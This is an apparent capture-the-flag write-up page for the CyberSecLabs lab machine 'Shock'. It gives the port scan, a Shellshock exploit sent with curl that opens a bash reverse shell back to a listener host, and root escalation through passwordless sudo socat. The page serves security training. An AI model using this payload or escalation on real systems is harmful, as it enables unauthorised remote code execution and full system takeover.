📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. CyberSecLabs

Shock

PreviousRedNextCMS

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap
sudo rustscan -a 172.31.1.3 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web service is open on port 80

And we can confirm that port 80 is really a web server.

Let's run Nikto, and after some time running, looks like the server is vulnerable to ShellShock vulnerability.

Exploitation

Since the shellshock vulnerability is pretty popular, we can find how to exploit and get a reverse shell from hacktricks

sudo nc -lvnp 80
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/80 0>&1' http://172.31.1.3/cgi-bin/test.cgi

Craft the shell to your needs and you should receive your shell.

Privilege Escalation

Running sudo -l we can confirm that we can run socat with root privilege without a password.

To gain root privilege, run the following

sudo socat stdin exec:/bin/sh